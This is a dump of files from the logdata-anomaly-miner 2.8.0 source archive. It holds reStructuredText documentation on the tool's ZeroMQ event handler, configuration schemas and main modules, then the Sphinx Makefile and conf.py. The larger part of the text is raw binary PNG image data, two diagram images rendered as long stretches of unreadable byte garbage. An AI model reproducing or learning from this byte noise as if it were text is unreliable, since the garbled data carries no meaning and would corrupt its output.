* **url**: String property with the url for the zmq-listener. If no url is defined, this handler will use 'ipc:///tmp/aminer'. A comprehensive list of all possible "endpoints" can be found at http://api.zeromq.org/master:zmq-bind .. code-block:: yaml EventHandlers: # output to zeromq using the topic 'aminer' - id: "zmqe" type: 'ZmqEventHandler' topic: 'aminer' url: 'tcp://*:5555' # tcp-port 5555 on all interfaces ------- Schemas ------- All analysis detectors, parsing models, and event handlers must be included in the validation and normalisation schemas for the YAML configurations. YamlConfig uses the ConfigValidator to normalize values and validate them against the validation schema. .. seealso:: :ref:`YamlConfig` :ref:`ConfigValidator` .. _BaseSchema: BaseSchema ~~~~~~~~~~ This module defines general configurations and Input configurations of the aminer. .. _Normalization: Normalization ~~~~~~~~~~~~~ Define all possible parameters and normalisation strategies such as default values for the defined group of modules. These groups are separated in the following modules: * **AnalysisNormalisationSchema** * **EventHandlerNormalisationSchema** * **ParserNormalisationSchema** .. _Validation: Validation ~~~~~~~~~~ Define all possible parameters and valid values for each module within the defined group of modules. These groups are separated in the following modules: * **AnalysisValidationSchema** * **EventHandlerValidationSchema** * **ParserValidationSchema** ------------ AMiner Files ------------ This section explains the functionality of important files of the aminer. .. _Aminer: Aminer ~~~~~~ This is the main module which starts the aminer program. It parses all arguments, initializes loggers, and handles graceful shutdowns. These loggers are by default divided into the following files: * **aminer.log**: Logs regarding the aminer such as the different startup stages of the process. The verbosity can be set with the Log.DebugLevel configuration. 
* **statistics.log**: Logs specific statistics such as the number of successfully processed log lines for each analysis component. * **aminerRemoteLog.log**: Logs all information about the changes done with the remote control using aminerremotecontrol.py. The process is started with root privileges to run all necessary tasks and it only uses the minimal set of imports. A subprocess starting the AnalysisChild is used for the main processing of log data. .. _AnalysisChild: AnalysisChild ~~~~~~~~~~~~~ This module handles sockets of the log files, registers all components, and runs the main analysis loop. It also handles the remote control sockets to change the running configuration using the AminerRemoteControlExecutionMethods. .. _AminerConfig: AminerConfig ~~~~~~~~~~~~ This module handles the loading and saving of configurations. When loading YAML configurations the configuration file is processed in YamlConfig. .. _YamlConfig: YamlConfig ~~~~~~~~~~ This module handles the loading of YAML configurations. It uses the ConfigValidator to normalize and validate the modules. When adding new components, they have to be added in this file. .. _ConfigValidator: ConfigValidator ~~~~~~~~~~~~~~~ This module normalizes, validates, and imports the modules for YAML configurations. logdata-anomaly-miner-2.8.0/docs/Makefile000066400000000000000000000011721500476301700202760ustar00rootroot00000000000000# Minimal makefile for Sphinx documentation # # You can set these variables from the command line, and also # from the environment for the first two. SPHINXOPTS ?= SPHINXBUILD ?= sphinx-build SOURCEDIR = . BUILDDIR = _build # Put it first so that "make" without argument is like "make help". help: @$(SPHINXBUILD) -M help "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) .PHONY: help Makefile # Catch-all target: route all unknown targets to Sphinx using the new # "make mode" option. $(O) is meant as a shortcut for $(SPHINXOPTS). 
%: Makefile @$(SPHINXBUILD) -M $@ "$(SOURCEDIR)" "$(BUILDDIR)" $(SPHINXOPTS) $(O) logdata-anomaly-miner-2.8.0/docs/conf.py000066400000000000000000000041501500476301700201340ustar00rootroot00000000000000# Configuration file for the Sphinx documentation builder. # # This file only contains a selection of the most common options. For a full # list see the documentation: # https://www.sphinx-doc.org/en/master/usage/configuration.html # -- Path setup -------------------------------------------------------------- # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. # import os import sys sys.path.insert(0, os.path.abspath('.')) # -- Project information ----------------------------------------------------- project = 'logdata-anomaly-miner' copyright = '2023, Florian Skopik, Markus Wurzenberger, Max Landauer, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf, Georg Hoeld' author = 'Florian Skopik, Markus Wurzenberger, Max Landauer, Georg Hoeld, Roman Fiedler, Wolfgang Hotwagner, Ernst Leierzopf' release = '2.8.0' # -- General configuration --------------------------------------------------- # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['recommonmark', 'sphinx.ext.autodoc', 'sphinx.ext.napoleon'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. # This pattern also affects html_static_path and html_extra_path. exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store'] # -- Options for HTML output ------------------------------------------------- # The theme to use for HTML and HTML Help pages. 
See the documentation for # a list of builtin themes. # html_theme = 'sphinx_rtd_theme' # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] logdata-anomaly-miner-2.8.0/docs/images/000077500000000000000000000000001500476301700201025ustar00rootroot00000000000000logdata-anomaly-miner-2.8.0/docs/images/aminer-config-color.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 logdata-anomaly-miner-2.8.0/docs/images/aminer-config-color.png000066400000000000000000000737031500476301700244540ustar00rootroot00000000000000PNG  IHDR<tV:tEXtmxfile%3Cmxfile%20host%3D%22app.diagrams.net%22%20modified%3D%222021-02-18T11%3A43%3A02.619Z%22%20agent%3D%225.0%20(X11)%22%20etag%3D%22XN7FnLR9z8rV8TrF2oWa%22%20version%3D%2214.4.2%22%20type%3D%22device%22%3E%3Cdiagram%20id%3D%225UVBhFNdrDuveJu0V3Pm%22%20name%3D%22Page-1%22%3E7Zpbj5s4FMc%2FTR47AswlPOYy7VRqtSNlpe72zQEH3DoYGZOE%2FfRrB3MnQ6qNk1mpiTRjji%2FA739sH5%2BZGVjtT58YTOOvNERkZhnhaQbWM8uyDGcufklLUVp8xyoNEcNhaTIbwwb%2Fg5TRUNYchyjrNOSUEo7TrjGgSYIC3rFBxuix22xHSfeuKYzQwLAJIBlav%2BGQx6V17hiN%2FQXhKK7ubBqqZg%2BrxsqQxTCkx5YJPM%2FAilHKy9L%2BtEJEwqu4lP0%2BXqitH4yhhF%2FTgfoH5%2FPLD7wJ%2FjReo%2F13HtJvH0w1zAGSXL2xelpeVAjEg6eyGBQEJyFiYAaWxxhztElhICuOQnphi%2FmeiCtTFLc0Fy3DL9vaAIOfEZPWP3IuhkHKnpWCm44os7KTqlHPhRhHp4tvbNYchQMiukecFaKJ6uDOFXrle5atro%2BNkq4yxS0RraofVM4T1UM3fEVBIf4F3BaYxt3FMAE644z%2BRCtKKDv3BqHnb4ULguUOE9Kye76xNBeauHrOVVwdRxPWK5x4giPM0nL12OGTZH97Z6ydT0Ez3aEz2sYItdp4c2y3dsaey%2B0c%2BR1zUvf8kT1owlv28qOHd72jTPF2deG2dc99N5ij7W507m9NqAcrsLyn4ey%2FL1hHN9i5tQWlv3bB2gaE%2FlYT2Pnjwbradyt36zojYAEwDNvQA9a2Hw%2FWG4D9hBLEoOy4oskORzmDHNNkwFtw4G9BTaiMrTo8lQkSHCUyjBPckLAvJVUsIt2FqtjjMJS3GVWx0flGsgDX6a7PYLg%2Bm85YdKZLlPmIt7tE0g7xQRQjWXyFLMNJVNWIG7Uq36lavV324%2FmjR0XgPFpF%2FxoVFwkkxW8dL%2Btoj0RL99WxeoC3hXw%2BiBd8gUlIfot5WUzv4WJauiOJN2JfbedeAKyRSOK%2BJ1%2F
tCYXLse9i4S81gfWvS9Roi89M7We1e0S%2Bfaz2yOZ8X6xXHCiqbOOOoNNCJnAFC5SEqrgOCMwyHHTpVu9jzsvGKo1sjuTB7LX81nxROEj%2FTtJt0RtbRCsbQ0SE8Ifu8GNI1R1eKRY3rsXzDP%2Bpu4ybXk%2BXjOYsQKqf1cr8Tg5Vn4mqoThkEeKDoQR1WLSapbJB9isPbRmdrLQolGM2TlST%2FQ9p1bFY4bbT9XJaVVtqxXIff1A1hyfVV5yicwb%2FfcZVjPLy5AzWfhVnqfUAyPUW72GEFv0baozGXGd6czPte0Zj1nB3%2B5ykOX%2BnirYUFHGkVq1sqzcFR7S6r1TD3OaGszzgORMT0KA78YPHshj8D9JG%2Fbl4A8XqTbGodqCBYM7o3%2Fi0KeYN4MsgY6MuKeMxjWgCyXNj7WFq2nyhNFV6%2FUCcFwoezDntqolOmP8luz9Zjrr8u1W1PqmhzxdFJceF0Kgv09sTbjqEEjDOkcoV%2B0wZh0w2HLrD1dHWBXHFZfOn%2BDIuaf6hATz%2FCw%3D%3D%3C%2Fdiagram%3E%3C%2Fmxfile%3E0^ IDATxgXg @AD Ĩ1&h4XbP,(6TlQc4GKQclػ ,6օݽ8?sogbvfVB!G&vB!% !BLB!< <B1yx!b0B!a!BC!B!&!BL<7oČ3о}{xzzVVVpuuEƍ1b ??_R \r_}Wkkkx{{˗%vA&A&ȑ#%bXJ{bly))SF0פ7+vaiiYd|2xmʕ+J9RM͛7+mիW]рI7oݽȇ<==QZ5-[Ve8N: mcbbJiWlZh!lot z«W=KWƍնc1>'22R~ǏWنǸ0 ԪUKi~'8vvvacc~˖-jonWL`ee%ķi8ay{xL ܽ{h֬\]]aii |ᇘ8q".^ֺsy>H >^3|"?s ֭u;d2ѣGE}tCy,]Tv3x2GL*zJ)7l Gdd$"##v ?^hx U lٲY&F%/wQe˖E:uPj";_deΝ;<`}? gϞiU~my[ZZ^zXbiq[ߏHL:Uhgoo/lH\Ӗ-[ѣG |rg.[,ׯ/ 4(.S[kٳȼ+UzZu*e~U}^ '''XZZ"88{ױo߾"GEE)ͧD[A֭Kʕ@˗/ v)|75kKh-)F5аaCBiz-mu~6m _-<\coo:u|Dɓn7C'sĤ|͉L&C5m6=TkZؕ*UL&٣C4xzz mj֬={ ++Khs]Ki[رC-y'v؁/^mܹ*זrJByyy8#;&L+~-}5=+''B[U"ܹsGœ9sԩSEBv4Wzm @ֺuT1D)|]ܹs';;M66lPe;C'sUŘ1cLOٸqy20(]dtжlٲE#BѴݻ'|+WgϞպ|3[}Vn.}94`xcUJĉJŃkOO4Ix$Uq6h@n֋ *SvmÇpuu+  x{aZ5O:scdNd$ZjL]">>^)n౰\.8OCǏ Ӝti̘1WIW/BuzݻTTt)]LxX#V(~Uq)~Uܾ@I,Up֚^~YځG۝K~I &;;:v=zr T|Z!رci :/mxm?;GUSU:{=.\PZnR<#F+Ν;z"%ѯZWҁ͛JsJ;𨺡B׮]ڵk1ydM4VRիJt-"K,Ӳe" = <_ŋ{WV~~iNU(~iӦe20(xmxm>W^i[(x!⭱HKKSZn xthXS?ܹ1pnߒ<𺭭Nmڴ-Z痗UVi}&OTQw!~Ez<&x(=~^^?SMq70DEE #F >\뼴QGS@${Vz&jHWL@ccN)])~ZILLTWׯbjxm/TZeǜ9sm6\p/Sx\z&m{5kVd:TQAkTѨQ#aEK!(Ad:t:/mDT?P׽{wu[){ Z{ ﱳ+2tMӧWIӧOė.]i=zS8mQlٲK#κ^3a=;w.2GL*tY/Sک-[VMI@?ca׮]JSB_~tooomM2Eh(]w}BO>DE7oT[C_~_|mȫi%x>C xqJAz…j&%%)@%ѯR <ΝSET"*(eHcǎM <f*~.ʁ'((H4e-X@|ѤI  w> |ذaΜ9Ox3nܸ8Cʕ+N@ݳ!{~NW>.U|p 2W~(==SNUQnC)y pQիWyf.wiVZ> gϞ{5._?2ٛDUEIWWW]:_SXXX`ĉEcǔ~zJ`~b {y0=33VYu"S|prvZ3G_ƚ5k)~mQ|Z/_OϞ=.[oi)faa 3/_ѣGp}TΏGL.Uaa jVVVضmy+E=н{w_-PdPZh=znݺ~+ ʕ+{j*duY_Cׯ;wʾ|tL'm肪 
*/23˕+-[W^#sgeeÇ+;`РAJTz~)zUC4 trrBUkw."&x7*v!11Q|cccUWrs.T퍄u6Lo鲾_k׮Up1J טvvv7oإBQ1g`ƌbB$سgT~AR!Ĩ;w.V{]  <ҥ :uꄔ! )) 9ugϞ]Y|9*W]v] !$۷oGJzjK1Y bI#"={D``eBY0b|bar >>>oMVbu2ŋ쌭[] !6mB*UpeK1Ν;>>> <ի'O] !%)))[.֮]+v)&)„ 0}t `ڴi  (ѿnN!cΜ98pe5 OS&3eΜ9 cdddN2!H -vD Ƽy.B̚5 aaab! xLW^|bA!DXXXb!: <&ȴi.vB$ɓ1sLlٲ B! ''VVVb!: <&?P "!''xLƍ#!!A2!HSNYfb!* <&Dbb"ԩ#vB$H͚5qu "44g B!dƌ2eeŋQ^}Z2!H'NEb! <&@vv6*T vBիWbQ0111رeB1>S۷O2J ((bA!;w.&N(v ЧO;wN2! ׯeŋ?֪N\xqׇG B!F@ZZ.`NNNZ}۰S.˲mׇG >k^rJa2dR3q ªU~*'\\\ѣ<\|X8VnGU"tѽ{wօG K.ň#ׯGll;Rw^lܸ0dXB×BÆ E; 6@,^ׯΝ;Eߡ(J۷#:: ,q>]vlٲeb׮]z +VR˅oLFjժUQFo 2A&}ENK;*)% 0tPr4ig}Sy&d2xd2n޼)J- } \}iѢ.\͛7兔r/Y&еkWܹsGXرc1tPl~!1{l;wĀl2o&կ_...Qvm\~Dͅ9"]x=]6m...&M}N< \j fBNPF ޽[DS+WT 50P}]6bbb4ٹs'j׮k׮!)) ~~~2e 7Dձ{nܽ{ΈGzz:ƍ???ov܉ϟcڵ_>޽AXnrՁӧ{|y8::HKKW_ ˯R nݺ\}bϰm6r!𤦦 [nEzz:F LSQ\ρbx)/X[[ 5()<^:.] ^ժUϑ+++!\M6}3ԩS}5mڴQZ'|h$$$^z[S <u2eʠo߾9s&N8Y^ZZ믱m6G‹;d27gmVZ%L{^ \t\gׯzffpp\oׯ#˗+5k;aڽ{`ii"xv܉f͚ ?~tGM6)ԭ[ .Dzz:r94Ǐf͚EСCHHHP 8 ۷ѽ{wkrPR%>}:t(urϣG₝;w"33(S _3gΠB z*={舃"==k׮N8Mٵk6}9rJdeeaݺupwwGjj*5x_ 4æM'vIJb֬YW1𨁁[W_ ֭_^zA.#++ SLѿB./xƌ#\uVԮ]åK  ǎCZΝ;cŊS\9#TT ~!?\^$;wÇ},QԘτ РA8p@RthРeQ%cJJpE.suQj(1۷ʕo&v)zuVXZZСCj0𨁁Ғٳgdž `|עE4d 77WRފ/_" /V9G Kď?(v%œ9saQR}4O>D2J6mȑ# o50PJ)G_SNRaҤIشi0PJ)G.]`bQ*ܹ]vJ)(SJ]Fjժ`Q R}zR`}xC)Txd2ٜy!d7QG \RJ8tPBJhoĉWJ"E:u d2>{QJ){#G:K0d`)t#;;ׯG͚51l0$&&jl qFl߾]iP?s?"|$D)LL9;)~ijJDž[lQ:~H]z*L+++=[n˗/K:`9r$*TS:G "::111sh.đ)57?/(?G(ZWZQسg6oެ!Eoٳ',--ѻwoL6 GAZZZ Tȑ#6mXYYW^رcG ==&;"ƍRJ;vu)>|jժ! XhpI\z |HMMիWq a… D@@<==^z!<<G1JWD`z Ԧ;R j늳UVCwbXx1FQFyA`kk KKKvvv-Z 00cƌŋ{>-d2?…ߙ(JދL ;R}'\34 WIZr2piEE̫,63j9 kf+{EDx(1OpiEEѷUIzi5rxC)T!$nhy*JڕCm0PJ)Ge!v* =Ѧ>Fx(ҡXQTlkNڽ"" 2%וo;RJx0 jK7 쪊J0\Zd2F7¢NwR黸n2Z`[ѷWi8SxG#2 y/r;RJ"^K>4[8JÕxk+"R0`sSpvq-J)E+XُRů {GzJQh]gx48`_>s|VbRꆩN \2n<~HL+MC-gѷaI:3lj.{EDT ؤpyU\{G:K;J)fޑ8<WU@҉ :?L&C^N*. 
z()I/D m\CX:m,քu7E&RJĵ#bMXw>caہ:?DA}ٸ ?63=k; KPZ_i(ؔgrLq3)o7bFT e<~Hrpmp(VrL*Fwz]UtwcR]\y/3{ED 6PZ ށ t*R9svyfC/n܍˫!qh<}=ygvL&CFV'D)TEGVK < d2> >}'R*}'V|PW_,?S?Hy&׸iD߁(S½f#a)x.|%y14";NF`HϋON⭧*חG VEy(Am} aQ <9!Hmg=aՈs2OZ_ΣRj<{oF,#f۬$w*vOi}x0|N,BkRJu7ı:+!L#2 O\Ôot7q <E)؇0XUŘxѷSi8zA& IDATG- J= Z]b^ZAAk0𨅁RJ>J=ku/uj+G`QR}4S x\/3 BJ˽;x5;z+_.o0𨁁ϣWsL(&P7޾xfz" >W Bm0ν8lR]cE$ڸ^Yjrs1$,A}G <ԔxSӰmWLz ׯ[ϲ623 |;zR;u' WEuF~^59x C<xJjJj <Gm_""q)(P7]NMC0קRgˠ2h$Bm܄2=?_/}(5xL&3@Dq~n<PP`Qw}.Zv~juQjHM%d2ѷ!G <kآ1ݽ.; `1J$dwOc۲I^i;k2HK-0PJ)GS<JECx(꣩J)c  zvG7)v juy{l4 mO-wCx(꣹udOJ?'5Fc~.`QR}4s/a9 6KGޫWem:?xC)T9݉uwV_6?xC)T9{lO0x0𨁁RJ>s'!ޢ8RJ>{؇0 ZӺxR-cf?5X Z G-ߌX`!8|)@Y/:g'&y3QJ)DȜȐT:~HƟľSԮP7OZO~^cu6C}){EDlL܃஁TCRJTnc03*OPy"EǜÔ5a{S࢏>FLTۼ7gpeA^95?0X EWڽ""C16gIa I)A1)" #16vCJi `B<2 AGJ G`RN*Wڽ""l03fbg!pT>mRj&>"lo"bF o:?qR28{{ Lޖ]Nl+^$3NǠߺ~[WQJ)5s.<8ϲ<~H]z 03.~[WsQJ)+/iJܼW8yc?~9č!0c?'oCN3/iwqQ{?zohXW_ޛާ`Uw%}5Sp)D0$-oib.,. ")b." "2&$az^9G|ϻY,pz,b Y%j;Tp:J}4JOX~ϣFsyB~naqW}ehaښ1ePJ)majsOa:)! ܬXO++0wz ; z>iZnٛ'qZ]Yv]31f[`aG+ J)b{4&&xNNg 'Ed|=^p kG6@J; yK#q ye%(*'6x&'$=(mO;rx]7v&JŮG jMPJ\0WŷW/\mcMtJOx!8#U(Bԝ X}{q}d?i;gM3/OOBQe*+Ffߔu'"MdpN ,G@zJԘ#bcHw0?R |PF9.D!A>JO8E"]]01w /!6r4(Rap: BL 8#yy!GOxTYۚ=ep<s/M j2x Cu2x5VWF"Y%j|r6 e]>x>9i.GxQ =0x1j쒢F{XOϝ餭Vecaښ1B;R]_7LLSNl=4XZWURJ)JO+Œ|uM? I]:37\EYuyK-} >v_"6f=*/l _/7 ;>WrJ)W#h۬󇜨 pmL +[4WsC$vg+U~aCb~^8e\玧RAt2^ӡܲAΕ:ȉ';|{,9ɠ45쳤WER}e 4_%QO2 <Ԫر t2F+U'!*Ks;血@);n֓<ȑ_w.=΁XqsL 7 Y%ju*tf+?i);/GeMB &l@g8 &Wޫ"!7Puy!\(RJ<IC Q]jp+M _ᔟ g!lA@RȬse:kzjqh?y/ɺҬB,D-x\B ="\D)T0J.xrnz{ Ly DP@'Fji{?ޭm;l}5ÌU34w7y^ 7N՟J~'R*>F<)_aӂMͬ{jGOFuϿLlL gf׍Wޫ"!#<7.D)x<|J} I}$_XOz,baNznu@^=@iqYaӐ2xhwJ)ǖp^1\SNA+>rl"&x >|1& GJZ<&[AN?G?~9k&RJh7n];Zc<Jܮ+xLٖj4;wJti*RJ8)..)L'ŎeڟʪWL{e?#7ڮ+xr0 T̟2G+I!$PJ)5>BfI} 6bKcY5af?n`D/\<3^[JͶ%Ze9d |<G+ J)b{y. 
I}]=×i:xFҭxXP$^L6Z?gޓ0xࡔR*F!!Gl,xe%5{XZdܼGj 1zr RJ<= A_<έ\5i`hC)T :>?|ꅴ˚ v5ԣ< =0x(r 4YlGy(xfi!ҮgDPH||v 39KsJ)uz =0x]Q`PYi vC`S)-*(-.Ûi(*,ƛE_j1xt W4D~g0Ommm?̆I'u6'3PW.x >c+v=3GO ͶaOS.3_kq74~2x,dNO;rPkx/&vp {a"(> v=f= >Qd<Y; W31 '=1S3ӆZ#zf=f5cߝXL_([=j ]n ^\>|FOd3 *W#/;yYF3u.(_cxWsZ?\?x޶?xfŪ8~ܦDot1<&`ߦF3,*TWU QόCa -?ΦrǏ}F&RJyZd衣BPJ)5 yCGRj< A)02x%GRJadK:/R =t_J)#/ 333 bDԿS 2'4?C9z˺sf5t [=7gnJ ++ i!556l@=j*(JTUUI2Kee%9+VW^ذaZt =`…RA!DX[[?c̙޽;䄨(6ٟZFTTG={6D_' 8RA!Dddd`РARn9s7nʕ+c"66PT(--<2TUUT*ܹs ۱rJaӧfϞ7"** s3x~ WWW "C6n'''ǐ,,Booơ7O1H+aݓz B!$'' z b<")) cB1 ͛7ٷoBX~=8 @0x kB~W Xh+BD F?AAARA!`RAObii#GH=!f &H=i#i jaڵF>}Я_?=666غu+x 77%%%RNy)))Ann.RRRHa֭Xd F~o߾?>GI=:yJ`<#::Xz5>bذa:t(޽{CP@J)5 {F1tP 6 իgDGG#??_2STUD,'IENDB`logdata-anomaly-miner-2.8.0/docs/images/analysis-pipeline.png000066400000000000000000010711321500476301700242430ustar00rootroot00000000000000        +G" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ?S((((((((((((((((((((((((((((((((((((((((((4|O5~16Z]K,?,Q4.%VjWoDvW9v'x'Fq'8UYQpA #o?>P?Wފ+_G/Cw(EKƟP>WgE/ #o?H[O(nZ`T+3`R}[x^% ūs]$lee1㌊O<,,wj^nufl`3%eQԱ|u+?.f_uY02R\cMhy۴WƩjz6_-%#1,MCe]鲉-.B4E|+obYiYåfGr'ٲ>kI]YN:huGw @tQ_f/⧊-,UZC}"EȈC`a@|Q_"~~8~$Vjɤ"{{$Ȯ&s_]E~j^ ]|qC?i?@tW-O?㏏vL?+߅= oon/{Z?y#W5e7[J̋$RەԌ &(ojz$ [N"*62>- ' >&H~%|A;hTIE~j_5IO/|M*?HY?i7 n?ksԵ _ׇ[>Oy#I+bP73Ng4QEQEQEQEQEQ_|Sb,uq۔(08U`I&>ڢ/ޱWSMnZK 9%$5柶/5 hFen^*g(ck>'+o[wJ̣>L K'>|!lż:vKT3䜑k QTZzFyD:S8ԆA`_C]'H:J0'9p~vyo_'>X],/m^}~xgO4KHAh 3KWb1xjV<C/u"IC?:kiT G'/Ci+쏇?wc~֯x_Sׯ5;uu{dEUm Ԛj׊_1,52FeK6.!r  A+? |IJ LdZ$Zzur}ύ?i|HinZ?,R=I{k$Eѡ _?ATs|%x3How]h!'¨Cc*?^mtf fi:0r[7h/KR?4]ZaXu z"oBDSfГ3~57RTJSC2)acݱYK'5 yUinDkNAhBO_uK!'EjG_kW?OMW+jp>_-5F٬2Fۑ:cx}}g LJ?뭯7аXcZIeP"[izt~?Kr8>}}E~V[i"ۍQt븥bW+<kǽ~Q_#}rNԚLcܤt+_\V [] ߪ_타@>j.r _|ߵo s[脠g"ckg"ch@jn=>|lԾ;ZӴH5MNtay -T {1V_)Rf]>PIu3 = 1Ё:M?qI. 
@=)""5ii+$ q rT<ďZ(C[|)t2(G<{9vz4rIz1g;RVxbT 췇qȍNWu?gPùTm>%{ll[ E|3?5Ӣ?Q<'mui6}wm!GN ƬC7S`c췥xZx[N6`bQoB `9p9(((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((((~MBuKc1@mT7dcEaNΪWRVzE-'/x:O Ƨ]Ggm) Oa]?ן>,7Ehd90[ ~*NOzŽGwfj+ WI!J py;ܲM^voD~|-})wjfc`2Y $?O%xG={ J)l~4OzwȟI7gɆ2Lctԭ|]cck&׽iRH3;~Ж%I>_&u/f}vk*Ps54WG3wO% z ou_s_&J{_:j[y8k5]Lz_{ LMKxPIi=5_^'ss9%G'S]\H]bq+e&jcp˜&y ϚG֗T3clKS0_$*3袊(_|(m0kr#6щ6K txg`tX\J JI|1OX<]a ?~'O,.΀=)_}_?U5_௵򦾳K_&Wxx)h:(>SC)^`~'WSS} }7qjb]sšw>6u+KD@b( ( ^ }j۬Oȕ趠U<a/W_ x7V_=+ jpUrH琨ڪXn2Z|!t6:lɜg]~D˪|W5E.0=+L}=IbQLc݉k/ 2o@?Ķ2 NZX%4uڂF0%%ǩ}}c^[Nq?ľbذ:9R'{؟5 j pIЖCϭuO&<a[;G&; N3 `_Ś?>?,{%S%·۟u|aȋ|`2!PWƞ&׵XRG)A ;d# qVد?7*jn{P״iZfkU ##y · ~#\3uir;I?:+_6F0L2IS >xP|5|UVp?땷J_Lۖӎcc_4~տ\5m>Sjۋ@USjۋ@8xZ\z2 6vG\k*&>7!}&z_CP%C֟;7=I2aA6>V=}FE|w_ %z&#iu];%Sb~ڿHc mWơj$(3+յ8t]*P$[BTdU,q ۖ]SMf_)veQ} RoT}C#d㗅7y[yO@?}i3gi0,V78it{#袀>NZX%4uڂF0%%ǩ}Yo<[^j7} d?\׫~Ӷ|/,Tcfx3* -.0(bIxE7R2>¿,8感Uߋ|cVצK;7pH@oڢ3̺s0-27[=Pwwcw1m$%̆Qn1r}pp ý}*{A~_h ߨN &\(9*?h>,6ocg(`;RNI=5EQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEWS < ROdo}ΖT'WXE,@I+>8ı$bґ2B;n;#sW,-oI{?**Nkm+ _wTX\B[˥؀8 2&o#.Hk;BM.Qs&܎_F ѡj?(?b_]-yO iޙT/u ĚM:|ž+ξoOZTyY_cxt*'GC>[G8_5z_gň"H(E @8F{3y5[o?ziTi G/Cw+Q|_~WU`t>K]J(UM~\<2xƿ/^[M=^F Gr2;WtӚewk~cx7f_Lc݌ e z?%՝@Ȑglq?h/WM16# sr>׼?xcTNլvZIwZ7}7s FTZ4 s::} w Î.;zk^\ @{_?x:OX<]a ?z/S%SU,> Z)jG_kPM}g LJ?뭯L} eѵGIY2!c8ݴ'Ex[KQӬӸQМRpp'_[>84Py׷q+HGI?C?FGZG ,+dKƺًRΗ1SM%3P,}K=5ok0iZ-,qyEQܞ}C%?U"kPHR{QEQEV'?J?[VbxD>E~w& YҺM%S_tW7+Do=&M4Z|ċ6_WIE~pxKdžu)؊Yp 1?@GGï\jvp3xwRDRVc0rW{^g{MƋ2=QjС2  @>KOޢ}Z+tB~mF#Wگ֓` uU*P~6J~ϧfBNqx1}G4;Tn7U:# k FI$8H**, ~ޤ=S G]V=]/1|R]bȞf.vc@Cx; k: oW?1I)>jR7+o|RԬsgpYS?27AW><X$^p}A\j~!ɩ2iGb7:>׳|Pk-6MGQYhpÑ v+>*~2xGMjIWnp>4'ۢWQK,=d`Fu?_[%\V!+;;HtH-mXmE8ע}?j.r @YE|)^F5yW  תE|)^F5yW  'Ĭ/#ԇMGǭ}7_ i|,,|SBդ{YErF"}@doc>>rOyK\K[y8dV 3 -gXKU$lW憵s?wۡ{kSv4RNeu 1^n?|$&K RP64#^HN `wI=qkxSǥؓOc|{>M)}.[{xKN!~g/,xgRA 
1݈kz ~\:uƧg7u)Zh$E%`v9h%}G4O4_,ʱEB@03r3su4mik v]UGhwXoW~1[mV1z?Dk~weP=W W↳mbS}?L2 zp>gcs}}:|%W/ԙg r#!#Ƕ(ի_)oE-${8'e/!bc#{z;fD'bt-J瑓Nxhڟ4093RU |.hL݆7E}3= `(AEQW?gBL.P$Ɵiȴè~OZF=;c?;wu^jQ[njw6C ! CNk (TU15s gb)kh  xk}H#oa_soP^+7>1&:Ww41Ԛ(>KjEss=Z2^ BĀPwPAh)?|AAj?]ETuvU?4P7<x.zm[[x.GBՏ=I5EQEQEU]WNX,&gXnx 0VR85j~~ֿj%ΟuI4gD2pE{PEPMWJ4 B+)dNǡ5{E/4 Qq ?55կ3ns)%Ŧ?{Ï>b}.Ů5,`$o/ *((-5<5.دϗYK)H͌F4-+[Jk,rD܌p`y=Aynݻ+'+͒zn(~.Z Iz+Kx$$qơU ;TPU5]*\Ӯ,5 Xl]:GE|ؿϢꗚrImPn|e$XЇ2h=q'? XOصƥB{^E?f|K$޳s"X$:Mu  49tM"M)[VF72_E i9eMz٢¼#ρ:7Q=s%e㓁~R|uap=wujU=s-9vY{ o\Yi56(26Su>?5%u͜_J"omѰ1zߛs=C;3p3RAh.# KQ߳Q KQ߳WKϹ_܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ/l_*l_*6=F_>##ܿ)j??)j?(܏rAAhϸde?r=?g?g k>ψ1gRCQfod˩C N vr^OYЏ}o*Dt溈e? }i"l/raU:9ъ:U kD6+UtoigݍWv}a`*_߄ڦHWT3f_5x/m-'Ы#<+#Qh~qXv{5z QZ8QEx>ȳ)%anGvAxnʭXPQ+1 w-4>yrhV1۠8>~M_"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?/ \?dƹ(p/7,R7 '_5G`}dƏY>"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?/ \?dƹ(p/7,R7 '_5G`}dƏY>"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?/ \?dƹ(p/7,R7 '_5G`}dƏY>"of=;?KgM '_4.?s4Q?_{:oY>"oO)qkg.?|EAK\{8vlΛO)qh/ \hðkct|EAKG,R73E[?|D?hX|fvo\In\E;0/o 